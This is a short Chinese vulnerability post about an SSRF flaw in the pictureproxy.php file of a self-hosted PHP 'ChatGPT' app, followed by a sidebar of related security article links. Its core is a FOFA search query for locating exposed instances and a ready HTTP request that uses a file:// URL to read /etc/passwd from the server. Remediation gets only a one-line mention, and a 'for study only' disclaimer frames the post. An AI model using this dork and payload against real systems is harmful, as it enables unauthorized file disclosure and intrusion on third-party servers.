chatgpt个人版ssrf漏洞

扣脚大汉在网络2024-09-17 18:32

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码 
title="ChatGPT个人专用版"

漏洞描述

该系统是一个开源的chatgpt系统,是PHP版调用OpenAI的API接口进行问答的模型,在prictureproxy.php文件处存在ssrf漏洞

漏洞复现

payload

yaml 复制代码 
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: x.x.x.x

修复建议

修改源代码,进行黑白名单

相关推荐
见青..7 天前
文件上传漏洞之原理、探测、利用、绕过、防御
web安全·网络安全·漏洞·文件上传
网络研究院7 天前
网络研究观-严重漏洞允许以 root 用户身份执行任意命令:CVE-2026-0273 分析
网络·安全·漏洞·修复·设备
阿昭L9 天前
Windows堆dword shoot
windows·安全·漏洞·堆溢出
南山丶无梅落11 天前
文件上传漏洞2
漏洞·文件上传·网安·条件竞争·二次渲染·0x00截断·图片马
菩提小狗17 天前
每日安全情报报告 · 2026-06-04
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗17 天前
每日安全情报报告 · 2026-06-03
网络安全·漏洞·cve·安全情报·每日安全
南山丶无梅落18 天前
XXE漏洞
xml·漏洞·xxe·网安
菩提小狗19 天前
每日安全情报报告 · 2026-06-02
网络安全·漏洞·cve·安全情报·每日安全
网络研究院20 天前
即将过期的安全启动证书将如何影响 Windows 设备
安全·微软·系统·漏洞·硬件
网络研究院20 天前
管理瘫痪、人员短缺:深度解析 NIST NVD 为什么审不动漏洞了?
网络·安全·漏洞·管理·危机
热门推荐
012026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?022026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?03GitHub 镜像站点04【AI】2026 年具身智能模型和世界模型总结052026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf06AI科技热点日报 | 2026年6月1日07AI一周事件 · 2026-06-03 至 2026-06-0908Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析09上线仅72小时被强制下架:Claude Fable 5 的短命10Snowflake (SNOW) 可比公司分析报告